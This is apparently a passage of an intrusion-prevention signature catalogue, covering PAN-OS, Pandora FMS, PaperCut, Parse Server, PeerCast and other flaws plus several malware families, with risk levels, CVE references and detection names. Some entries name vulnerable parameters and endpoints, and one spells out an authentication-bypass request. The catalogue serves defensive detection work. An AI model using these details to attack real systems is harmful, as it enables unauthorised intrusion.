PAN-OS-GlobalProtect-Remote-Code-Execution-CVE-2019-1579

About this vulnerability:

A vulnerability in GlobalProtect

Risk:

High

First detected in:

sgpkg-ips-1379-5242

Last changed:

sgpkg-ips-1379-5242

Platform:

Generic

Software:

GlobalProtect

Type:

Input Validation

Description:

A format string vulnerability has been reported in PAN-OS versions before 7.1.18, 8.0.11-h1, and 8.1.2 if GlobalProtect Portal or GlobalProtect Gateway Interface is enabled. A successful exploit may allow an unauthenticated attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-PAN-OS-GlobalProtect-Remote-Code-Execution-CVE-2019-1579

References:

CVE-2019-1579
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579

PAN-OS-Remote-Code-Execution-CVE-2017-15944

About this vulnerability:

A vulnerability in PAN-OS

Risk:

High

First detected in:

sgpkg-ips-1496-5242

Last changed:

sgpkg-ips-1496-5242

Platform:

PAN-OS

Software:

<os>

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in Palo Alto Networks PAN-OS versions before 6.1.19, 7.0.19, 7.1.14, and 8.0.6.

Situation:

HTTP_CRL-PAN-OS-Remote-Code-Execution-CVE-2017-15944

References:

CVE-2017-15944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15944

Panasonic-Security-API-SDK-Getinfostring-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Panasonic Security API SDK

Risk:

Moderate

First detected in:

sgpkg-ips-660-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Panasonic Security API SDK

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Panasonic Security API SDK, Ipropsapi ActiveX Control component. The vulnerability is due to lack of bounds checking on the parameter of the GetInfoString method. A remote attacker can exploit this vulnerability by enticing the victim to visit a specially crafted webpage. Successful exploitation could lead to remote code execution in the security context of the currently logged on user.

Situation:

File-Text_Panasonic-Security-API-SDK-Getinfostring-Stack-Buffer-Overflow

References:

CVE-2015-4647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4647

Panasonic-Security-API-SDK-Iprosapi-ActiveX-Control-Filepassword-Buffer-Overflow

About this vulnerability:

A vulnerability in Panasonic Security API SDK

Risk:

Moderate

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Panasonic Security API SDK

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the Ipropsapi ActiveX Control component of the Panasonic Security API SDK. The vulnerability is due to an error when processing the FilePassword property. A remote attacker can exploit this vulnerability by enticing the victim to visit a specially crafted webpage. Successful exploitation could lead to code execution under the security context of the currently logged on user.

Situation:

File-Text_Panasonic-Security-API-SDK-Iprosapi-ActiveX-Control-Filepassword-Buffer-Overflow

References:

CVE-2015-4647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4647

Panasonic-Security-API-SDK-Multicastaddr-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Panasonic Security API SDK

Risk:

Moderate

First detected in:

sgpkg-ips-662-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Panasonic Security API SDK

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Panasonic Security API SDK, Ipropsapi.ipropsapiCtrl.1 ActiveX Control component. The vulnerability is due to a lack of boundary checks on a parameter passed to the MulticastAddr method. A remote attacker can leverage this to cause a stack buffer overflow. A remote attacker can exploit this vulnerability by enticing the victim to visit a specially crafted webpage. Successful exploitation could lead to remote code execution in the context of the affected user.

Situation:

File-Text_Panasonic-Security-API-SDK-Multicastaddr-Stack-Buffer-Overflow

References:

CVE-2015-4648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4648

Panda-AntiVirus-Zoo-Archive-Decompression-Buffer-Overflow

About this vulnerability:

A vulnerability in Panda Software Antivirus

Risk:

Moderate

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Panda Software Antivirus

Type:

Malfunction

Description:

There exists a heap-based buffer overflow in Panda Antivirus. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Panda-AntiVirus-Zoo-Archive-Decompression-Buffer-Overflow

References:

CVE-2005-3922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3922

BID-15616
http://www.securityfocus.com/bid/15616

Pandora-FMS-Authenticated-Command-Injection-CVE-2024-11320

About this vulnerability:

A vulnerability in Pandora FMS

Risk:

High

First detected in:

sgpkg-ips-1824-5242

Last changed:

sgpkg-ips-1824-5242

Platform:

Unix; Linux

Software:

Pandora FMS

Type:

Input Validation

Description:

A vulnerability in Pandora FMS, versions v7.0NG.718 through <= v7.0NG.777.4, which allows remote attackers to execute arbitrary code via the ldap_admin_login parameter in a POST request to /pandora_console/index.php, do to insufficient input validation.

Situation:

HTTP_CRL-Pandora-FMS-Authenticated-Command-Injection-CVE-2024-11320

References:

CVE-2024-11320
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11320

Pandora-FMS-Authentication-Bypass

About this vulnerability:

A Pandora FMS Authentication Bypass vulnerability.

Risk:

High

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Pandora FMS

Type:

Input Validation

Description:

A vulnerability in Pandora FMS, versions 3.1 and before, which allows remote attackers to bypass authentication by sending a request to index.php with "admin" in the loginhash_user parameter in conjunction with the md5 hash of "admin".

Situation:

HTTP_CSU_Pandora-FMS-Authentication-Bypass

References:

CVE-2010-4279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4279

BID-45112
http://www.securityfocus.com/bid/45112

OSVDB-69549
http://www.osvdb.org/69549

Pandora-FMS-chromium_path-Or-phantomjs_bin-RCE-CVE-2024-12971

About this vulnerability:

A vulnerability in Pandora FMS

Risk:

High

First detected in:

sgpkg-ips-1866-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Linux

Software:

Pandora FMS

Type:

Input Validation

Description:

An vulnerability in Pandora FMS, versions v7.0NG.724 <= v7.0NG.767 and v7.0NG.768 <= v7.0NG.780, which allows remote attackers to execute arbitrary code on a target system via the chromium_path and phantomjs_bin parameters, due to insufficient validation.

Situation:

HTTP_CRL-Pandora-FMS-chromium_path-Or-phantomjs_bin-RCE-CVE-2024-12971

References:

CVE-2024-12971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12971

Pandora-FMS-Events-RCE

About this vulnerability:

A vulnerability in Pandora FMS

Risk:

High

First detected in:

sgpkg-ips-1280-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Pandora FMS

Type:

Input Validation

Description:

There exists a vulnerability in Pandora FMS, version 7.0 NG 744, which allows remote attackers to execute arbitrary commands via the target parameter to the Events function, due to the lack of input validation.

Situation:

HTTP_CRL-Pandora-FMS-Events-RCE

References:

CVE-2020-13851
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13851

Pandora-FMS-Ping-Authenticated-RCE

About this vulnerability:	A vulnerability in Pandora FMS
Risk:	High
First detected in:	sgpkg-ips-1297-5242
Last changed:	sgpkg-ips-1297-5242
Platform:	Linux
Software:	Pandora FMS
Type:	Input Validation
Description:	There exists a vulnerability in Pandora FMS, version 7.0NG, which allows remote attackers to execute arbitrary system commands through the select_ips parameter in a POST to net_tools.php, due to the lack of user input validation.
Situation:	HTTP_CRL-Pandora-FMS-Ping-Authenticated-RCE

Papercut-Fileuploadauthenticationfilter-Authentication-Bypass

About this vulnerability:

A vulnerability in PaperCut MF/NG

Risk:

High

First detected in:

sgpkg-ips-1636-5242

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

PaperCut MF/NG

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported for PaperCut NG. Successfully exploiting this vulnerability could result in unauthenticated file upload and lead to possible denial of service conditions.

Situation:

HTTP_CSU-Papercut-Fileuploadauthenticationfilter-Authentication-Bypass

References:

CVE-2023-3486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3486

Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27350

About this vulnerability:

An attempt to exploit a vulnerability in PaperCut MF/NG detected

Risk:

High

First detected in:

sgpkg-ips-1581-5242

Last changed:

sgpkg-ips-1581-5242

Platform:

Generic

Software:

PaperCut MF/NG

Type:

Insecure Configuration

Description:

This vulnerability exists within the SetupCompleted class of PaperCut NG 22.0.5 (Build 63914). An unauthenticated attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM.

Situation:

HTTP_CRL-Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27350

References:

CVE-2023-27350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27350

Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27351

About this vulnerability:

An attempt to exploit a vulnerability in PaperCut MF/NG detected

Risk:

High

First detected in:

sgpkg-ips-1581-5242

Last changed:

sgpkg-ips-1581-5242

Platform:

Generic

Software:

PaperCut MF/NG

Type:

Input Validation

Description:

This vulnerability exists within the SecurityRequestFilter class of PaperCut NG 22.0.5 (Build 63914). The issue results from improper implementation of the authentication algorithm. An unauthenticated attacker can leverage this vulnerability to bypass authentication on the system.

Situation:

HTTP_CRL-Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27351

References:

CVE-2023-27351
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27351

Papercut-NG-And-MF-Messagecontroller-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in PaperCut MF

Risk:

Moderate

First detected in:

sgpkg-ips-1723-5242

Last changed:

sgpkg-ips-1723-5242

Platform:

Generic

Software:

PaperCut MF/NG

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability have been reported in PaperCut NG and MF. The vulnerability is due to insufficient filtering of HTML tags in user-provided data. A remote attacker could exploit the vulnerability by enticing a victim to open a crafted link. Successful exploitation could result in execution of arbitrary script code in the victim's browser.

Situation:

HTTP_CSU-Papercut-NG-And-MF-Messagecontroller-Reflected-Cross-Site-Scripting

References:

CVE-2024-1883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1883

Papercut-NG-And-MF-PC-Upconnector-Server-Side-Request-Forgery

About this vulnerability:

A vulnerability in PaperCut MF

Risk:

Moderate

First detected in:

sgpkg-ips-1777-5242

Last changed:

sgpkg-ips-1777-5242

Platform:

Generic

Software:

PaperCut MF/NG

Type:

Malfunction

Description:

Missing authentication on pc-upconnector requests causes a server-side request forgery vulnerability in Papercut. A successful exploitation may allow an attacker to leak information from the target system.

Situation:

HTTP_CS-Papercut-NG-And-MF-PC-Upconnector-Server-Side-Request-Forgery

References:

CVE-2024-1884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1884

Papercut-NG-External-User-Lookup-Code-Injection

About this vulnerability:

A vulnerability in PaperCut PaperCut MF

Risk:

Moderate

First detected in:

sgpkg-ips-1655-5242

Last changed:

sgpkg-ips-1655-5242

Platform:

Generic

Software:

PaperCut MF/NG

Type:

Input Validation

Description:

The lack of proper validation of a user-supplied string before using it to execute Java code causes a code injection vulnerability in PaperCut MF and NG. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Papercut-NG-External-User-Lookup-Code-Injection

References:

CVE-2023-39469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39469

Papercut-WebDAV-Path-Traversal-CVE-2023-39143

About this vulnerability:

A vulnerability in PaperCut

Risk:

High

First detected in:

sgpkg-ips-1831-5242

Last changed:

sgpkg-ips-1831-5242

Platform:

Generic

Software:

PaperCut MF/NG

Type:

Directory Traversal

Description:

A path traversal vulnerability in PaperCut NG and PaperCut MF before 22.1.3 on Windows allows an unauthenticated attacker to access, upload, and delete arbitrary files.

Situation:

HTTP_CSU-Papercut-WebDAV-Path-Traversal-CVE-2023-39143

References:

CVE-2023-39143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39143

Paradoxyhua-Botnet

About this vulnerability:	Paradoxyhua botnet
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Linux
Software:	<os>
Type:	Code Injection
Description:	Paradoxyhua is a worm that infects Linux-based systems.
Situation:	Generic_CS-Paradoxyhua-Linux-Infection-Traffic

Parallax-RAT-Traffic

About this vulnerability:	Parallax RAT traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1243-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Parallax Remote Access Trojan (RAT) is a malicious program capable to control the infected system.
Situation:	Generic_CS-Parallax-RAT-Traffic

Parse-Server-Databasecontroller-Prototype-Pollution

About this vulnerability:

A vulnerability in Parse Server

Risk:

High

First detected in:

sgpkg-ips-1457-5242

Last changed:

sgpkg-ips-1457-5242

Platform:

Generic

Software:

Parse Server

Type:

Input Validation

Description:

A prototype pollution vulnerability has been reported in Parse Server. This vulnerability is due to improper input validation for the DatabaseController. A remote, unauthorized attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result, in the worst case, in remote code execution.

Situation:

File-Text_Parse-Server-Databasecontroller-Prototype-Pollution

References:

CVE-2022-24760
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24760

Parse-Server-literalizeRegexPart-CVE-2024-39309-SQL-Injection

About this vulnerability:

A vulnerability in Parse Server

Risk:

Moderate

First detected in:

sgpkg-ips-1753-5242

Last changed:

sgpkg-ips-1753-5242

Platform:

Generic

Software:

Parse Server

Type:

Input Validation

Description:

Improper input validation in the literalizeRegexPart function causes an SQL injection vulnerability in Parse Server. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CS-Parse-Server-literalizeRegexPart-CVE-2024-39309-SQL-Injection

References:

CVE-2024-39309
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39309

Parse-Server-literalizeRegexPart-SQL-Injection

About this vulnerability:

A vulnerability in Parse Server

Risk:

High

First detected in:

sgpkg-ips-1712-5242

Last changed:

sgpkg-ips-1712-5242

Platform:

Generic

Software:

Parse Server

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported for Parse Server. This vulnerability is due to improper input validation in the "literalizeRegexPart" function. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.

Situation:

HTTP_CSU-Parse-Server-literalizeRegexPart-SQL-Injection

References:

CVE-2024-27298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27298

Parse-Server-Transformupdate-Prototype-Pollution-CVE-2022-39396

About this vulnerability:

A vulnerability in Parse Server

Risk:

High

First detected in:

sgpkg-ips-1608-5242

Last changed:

sgpkg-ips-1608-5242

Platform:

Generic

Software:

Parse Server

Type:

Input Validation

Description:

A prototype pollution vulnerability has been reported in Parse server. This vulnerability is due to improper input validation when processing requests for updating objects. A remote, unauthorized attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service, and in the worst case arbitrary code execution under the security context of the user running Parse server.

Situation:

File-Text_Parse-Server-Transformupdate-Prototype-Pollution-CVE-2022-39396

References:

CVE-2022-39396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39396

Pastebin-File-Potentially-Containing-Malware-C2-Address

About this vulnerability:	A suspicious pastebin file access detected
Risk:	High
First detected in:	sgpkg-ips-1852-5242
Last changed:	sgpkg-ips-1852-5242
Platform:	Generic
Software:	Any Software
Type:	Backdoor
Description:	Malware may utilize "pastebin.com", a legitimate text storage service, to host their command-and-control (C2) address. They could just connect to a fixed pastebin file and collect the address before calling home. This way, the address could be dynamically updated without client-side modification. This fingerprint aims to detect such "pastebin.com" files.
Situation:	File-Text_Pastebin-File-Potentially-Containing-Malware-C2-Address

Patrowl-PatrowlManager-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Patrowl PatrowlManager.

Risk:

High

First detected in:

sgpkg-ips-1469-5242

Last changed:

sgpkg-ips-1469-5242

Platform:

Generic

Software:

Patrowl PatrowlManager

Type:

Input Validation

Description:

A vulnerability in Patrowl PatrowlManager, versions prior to 1.7.7, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to the insufficient validation of the value of the "engine" key and the file extension for the newly created file on the server.

Situation:

HTTP_CS-Patrowl-PatrowlManager-Unrestricted-File-Upload

References:

CVE-2021-43829
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43829

PBot-Malware

About this vulnerability:	PBot malware
Risk:	High
First detected in:	sgpkg-ips-367-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	Any Software
Type:	Post Compromise Behaviour
Description:	PBot is a remote control program written in PHP scripting language. It is often installed to compromised Linux systems.
Situation:	HTTP_SS-PBot-Malware File-Text_PBot-Malware

PCMan-FTP-Server-Directory-Traversal

About this vulnerability:

A PCMan FTP Server Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PCMan FTP Server

Type:

Directory Traversal

Description:

A vulnerability in PCMan FTP Server, version 2.0.7, which allows remote attackers to read arbitrary files via a directory traversal in a RETR command.

Situation:

FTP_CS-Attempted-FTP-Directory-Traversal

References:

CVE-2015-7601
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7601

PcVue-SCADA-SVUIGrd.ocx-ActiveX-Control-Multiple-Buffer-Overflow-Vulnerabilities

About this vulnerability:

A vulnerability in PcVue

Risk:

Moderate

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PcVue

Type:

Buffer Overflow

Description:

There are multiple insecure methods in ARC Informatique PcVue 6.0 through 10.0 that allow remote attackers to modify files.

Situation:

File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-DeletePage
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-AddPage
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-SaveObject
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-LoadObject
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-GetExtendedColor

References:

CVE-2011-4044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4044

PDF-Multiple-Stream-Filters-Obfuscation

About this vulnerability:	Usage of multiple stream filters detected
Risk:	Moderate
First detected in:	sgpkg-ips-459-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	Usage of multiple stream filters on a PDF stream object was detected. Stream filters are normally used to encode/compress content in PDF files, but using multiple (more than two) filters to encode/compress a single object is fairly uncommon and may be an attempt to hide malicious content.
Situation:	File-PDF_Multiple-Stream-Filters-Obfuscation

Pdfium-Heap-Buffer-Overflow-Vulnerability

About this vulnerability:

An attempt to exploit a vulnerability in Pdfium detected

Risk:

High

First detected in:

sgpkg-ips-1393-5242

Last changed:

sgpkg-ips-1397-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a heap buffer overflow vulnerability in Pdfium detected.

Situation:

File-PDF_Pdfium-Heap-Buffer-Overflow-Vulnerability

References:

CVE-2021-37984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37984

PDGSoft-Shopping-Cart-Orders-Exposure

About this vulnerability:

A vulnerability in PDGSoft Shopping Cart configuration

Risk:

Moderate

First detected in:

sgpkg-ips-631-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

PDGSoft Shopping Cart

Type:

Insecure Configuration

Description:

Misconfiguration of the PDGSoft Shopping Cart program "shopper.cgi" can disclose critical information.

Situation:

HTTP_CSU-PDGSoft-Shopping-Cart-Orders-Exposure

References:

CVE-1999-0608
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0608

Pear-Archive-Tar-CVE-2021-32610-Symbolic-Link-Handling-Arbitrary-File-Write

About this vulnerability:

A vulnerability in PEAR Archive_Tar

Risk:

Moderate

First detected in:

sgpkg-ips-1378-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

PEAR Archive_Tar

Type:

Malfunction

Description:

Improper validation of file names inside TAR files causes a vulnerability in PEAR Archive_Tar, allowing an attacker to overwrite arbitrary files on the target system by means of a crafted archive file.

Situation:

File-Binary_Suspicious-File-Name-In-Tar-Archive

References:

CVE-2021-32610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32610

Pear-Archive-Tar-File-Protocol-Handling-Arbitrary-File-Overwrite

About this vulnerability:

A vulnerability in PEAR Archive_Tar

Risk:

Moderate

First detected in:

sgpkg-ips-1311-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

PEAR Archive_Tar; Drupal

Type:

Malfunction

Description:

Improper archive member file name validation causes a file overwrite vulnerability in the PEAR Archive_Tar module of Drupal. A successful exploit allows an attacker to overwrite arbitrary files with the privileges of the affected process.

Situation:

References:

CVE-2020-28949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949

Pear-Archive-Tar-Phar-Protocol-Handling-Deserialization-Code-Execution

About this vulnerability:

A vulnerability in PEAR Archive_Tar

Risk:

Moderate

First detected in:

sgpkg-ips-1304-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

PEAR Archive_Tar; Drupal

Type:

Malfunction

Description:

Improper validation of file names in the PEAR Archive_Tar module causes a deserialization vulnerability which can allow an attacker to execute arbitrary code on the target system with the privileges of the affected program.

Situation:

File-Binary_Suspicious-File-Name-In-Tar-Archive

References:

CVE-2020-28948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28948

Pear-Archive-Tar-Symbolic-Link-Handling-Arbitrary-File-Overwrite

About this vulnerability:

A vulnerability in PEAR Archive_Tar

Risk:

Moderate

First detected in:

sgpkg-ips-1320-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

PEAR Archive_Tar; Drupal

Type:

Malfunction

Description:

Improper validation of file names in TAR archives causes a vulnerability in the PEAR Archive_Tar module for Drupal. A successful exploit allows an attacker to overwrite arbitrary files on the target system.

Situation:

File-Binary_Suspicious-Link-Name-In-Tar-Archive

References:

CVE-2020-36193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36193

PEDICOM-Polyglot-File

About this vulnerability:	PEDICOM polyglot file was detected
Risk:	High
First detected in:	sgpkg-ips-1152-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	PEDICOM is a polyglot file combining a PE executable and DICOM image file.
Situation:	File-Exe_PEDICOM-Polyglot-File

PeerCast-Get-Request-Format-String

About this vulnerability:

A vulnerability in PeerCast

Risk:

High

First detected in:

sgpkg-ips-348-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PeerCast

Type:

Input Validation

Description:

There is a vulnerability in PeerCast.

Situation:

Generic_CS-PeerCast-Request-Format-String
HTTP_CSU-PeerCast-Request-Format-String

References:

CVE-2005-1806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1806

PeerCast-HTTP-Authentication-Buffer-Overflow

About this vulnerability:	A buffer overflow attempt in PeerCast HTTP Authentication was detected
Risk:	Moderate
First detected in:	sgpkg-ips-500-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PeerCast
Type:	Buffer Overflow
Description:	A long authorization header was detected in PeerCast login port due to a likely buffer overflow attempt.
Situation:	HTTP_CSH-PeerCast-HTTP-Authentication-Buffer-Overflow

PeerCast-Stream-Buffer-Overflow

About this vulnerability:

Stack based buffer overflow in PeerCast

Risk:

High

First detected in:

sgpkg-ips-342-4219

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

PeerCast

Type:

Buffer Overflow

Description:

Multiple stack-based buffer overflows in the procConnectArgs function in PeerCast before 0.1217 allow remote attackers to execute arbitrary code.

Situation:

HTTP_CSU-PeerCast-Stream-BOF

References:

CVE-2006-1148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1148

BID-17040
http://www.securityfocus.com/bid/17040

OSVDB-23777
http://www.osvdb.org/23777

Pentaho-Business-Server-Auth-Bypass-And-Server-Side-Template-Injection-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Pentaho Business Analytics Server detected

Risk:

High

First detected in:

sgpkg-ips-1636-5242

Last changed:

sgpkg-ips-1636-5242

Platform:

Unix;Linux;Windows

Software:

Pentaho Business Analytics Server

Type:

Input Validation

Description:

A vulnerability in Pentaho Business Analytics Server, versions 9.4.0.1 and 9.3.0.2, including 8.3.x, which allows remote attackers to bypass authentication and achieve remote code execution by sending a GET request to /api/ldap/config/ldapTreeNodeChildren, followed by a series of characters allowed by the regex validation, which then allows the attacker to append any characters of their choice.

Situation:

HTTP_CSU-Pentaho-Business-Server-Auth-Bypass-And-Server-Side-Template-Injection-RCE

References:

CVE-2022-43939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43939

Pentaho-Business-Server-Server-Side-Template-Injection-CVE-2022-43769

About this vulnerability:

A vulnerability in Pentaho Business Analytics Server

Risk:

High

First detected in:

sgpkg-ips-1846-5242

Last changed:

sgpkg-ips-1846-5242

Platform:

Unix;Linux;Windows

Software:

Pentaho Business Analytics Server

Type:

Input Validation

Description:

A Thymeleaf template injection vulnerability has been reported in Pentaho Business Analytics Server, versions 9.4.0.1 and 9.3.0.2, including 8.3.x. This vulnerability can be chained together with an authentication bypass vulnerability CVE-2022-43939 for unauthenticated remote command execution via a single crafted HTTP GET request.

Situation:

HTTP_CSU-Pentaho-Business-Server-Auth-Bypass-And-Server-Side-Template-Injection-RCE

References:

CVE-2022-43769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43769

Percent-Encoded-Ascii-Control-Characters

About this vulnerability:	HTTP POST with percent encoded ASCII control characters
Risk:	Low
First detected in:	sgpkg-ips-798-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Post Compromise Behaviour
Description:	A HTTP POST request containing percent encoded ASCII control characters is very unusual for most web applications and may indicate encrypted malware traffic.
Situation:	HTTP_CS-Percent-Encoded-Ascii-Control-Characters

Perl-Archive-Tar-Arbitrary-File-Overwrite

About this vulnerability:

A vulnerability in Perl Foundation Archive::Tar

Risk:

Moderate

First detected in:

sgpkg-ips-1107-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Perl

Type:

Input Validation

Description:

Improper handling of symbolic links in a tar archive causes a file overwrite vulnerability in the Perl Archive::Tar component. A successful exploit allows an attacker to overwrite files on the target system.

Situation:

File-Binary_Perl-Archive-Tar-Arbitrary-File-Overwrite

References:

CVE-2018-12015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12015

Perl-Archive-Zip-Arbitrary-File-Overwrite

About this vulnerability:

A vulnerability in Perl Foundation Archive::Zip

Risk:

Moderate

First detected in:

sgpkg-ips-1105-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Perl

Type:

Input Validation

Description:

Improper path sanitization in the Perl Archive::Zip module causes a file overwrite vulnerability, which can be exploited to overwrite arbitrary files on the target system.

Situation:

File-Zip_Perl-Archive-Zip-Arbitrary-File-Overwrite

References:

CVE-2018-10860
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10860

Perl-Obfuscator-Code

About this vulnerability:	Executable code obfuscated with online Perl obfuscator
Risk:	Moderate
First detected in:	sgpkg-ips-767-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Post Compromise Behaviour
Description:	Seeing obfuscated code may sometimes indicate malicious code trying to evade network inspection.
Situation:	File-Text_Perl-Obfuscator-Code

Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101

About this vulnerability:

A vulnerability in Perl Spreadsheet::ParseExcel

Risk:

High

First detected in:

sgpkg-ips-1705-5242

Last changed:

sgpkg-ips-1705-5242

Platform:

Generic

Software:

Perl; Barracuda ESG

Type:

Input Validation

Description:

A code injection vulnerability has been reported in the Spreadsheet::ParseExcel module of Perl. The vulnerability is due to passing invalidated input from a file into the Perl eval function. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted file, or by sending a crafted request to the target application using the vulnerable library. Successful exploitation of this vulnerability could result in arbitrary code execution in the security context of the application using the vulnerable library.

Situation:

File-OLE_Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101
File-TextId_Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101

References:

CVE-2023-7101
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7101

Perseus-Trojan-Infection-Traffic

About this vulnerability:	Perseus trojan infection traffic
Risk:	Moderate
First detected in:	sgpkg-ips-1357-5242
Last changed:	sgpkg-ips-1357-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Perseus trojan infection traffic was detected.
Situation:	MSSQL_Perseus-Trojan-Infection-Traffic

Persistent-Systems-Radia-Client-Automation-Command-Execution

About this vulnerability:

A vulnerability in Persistent Systems Radia Client Automation

Risk:

Moderate

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Persistent Systems Radia Client Automation

Type:

Malfunction

Description:

A command execution vulnerability exists in Persistent Systems Radia Client Automation. The vulnerability is due to missing authentication while processing requests to the radexecd process. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected system. Successful exploitation could allow execution of arbitrary commands with SYSTEM privileges.

Situation:

